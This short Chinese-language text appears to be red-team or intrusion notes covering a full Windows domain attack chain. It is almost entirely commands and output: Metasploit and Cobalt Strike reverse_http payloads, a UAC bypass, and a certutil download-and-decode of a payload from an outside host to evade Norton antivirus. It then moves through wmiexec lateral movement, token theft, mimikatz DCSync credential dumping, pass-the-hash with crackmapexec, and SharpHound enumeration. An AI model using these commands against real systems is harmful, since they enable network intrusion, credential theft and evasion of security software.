前言

Metasploit 特权提权

MSF：use exploit/multi/handlerset payload windows/meterpreter/reverse_http
CS：创建监听器windows/foreign/reverse_http执行监听器 spawn msf

run post/multi/recon/local_exploit_suggester

exploit/windows/local/bypassuac_sdclt

MSF:backgrounduse exploit/windows/local/payload_injectset payload windows/meterpreter/reverse_httpset session 3run
CS:windows/beacon_http/reverse_http

内网横向移动

 proxychains python3 wmiexec.py -shell-type cmd administrator:password@10.226.0.108 -codec gbk

Bypass 诺顿 AV 上线到 CobaltStrike

certutil.exe -urlcache -split -f http://inbug.org:80/download/main.exe

certutil -encode main.exe main.txt

certutil.exe -urlcache -split -f http://inbug.org:80/download/main.txt
certutil -decode main.txt main.exe

令牌窃取拿到域管

beacon> shell net group "Domain Controllers" /domain[*] Tasked beacon to run: net group "Domain Controllers" /domain[+] host called home, sent: 69 bytes[+] received output:The request will be processed at a domain controller for domain inbug.org.
Group name     Domain ControllersComment        All domain controllers in the domain
Members
-------------------------------------------------------------------------------xxADC01$   192.168.101.4    xxxxN024$ 192.168.0.20      xxxGN042$ 192.168.0.154               xxxGN043$ 192.168.0.19xxxGN052$   192.168.0.14             xxxGN053$    192.168.0.31            xxSERVER1$   10.226.0.150xxPSERVER116$  10.225.241.149          xxSERVER400$  192.168.105.5           xxSERVER401$  192.168.105.6        xxSERVER505$   10.231.1.15        xxSERVER506$    10.232.55.60         xxSERVER600$    10.227.69.108 xxSERVER813$    10.225.240.16         The command completed successfully.

mimikatz lsadump::dcsync /domain:psnet.com /all /csv

mimikatz lsadump::dcsync /domain:inbug.org /user:Administrator

proxychains crackmapexec smb 192.168.0.0/24 -u administrator -H 4a03985f63e4dxxxxxxx -d inbug.org -x "net user"

execute-assembly /Users/saulgoodman/Downloads/SharpHound.exe -c all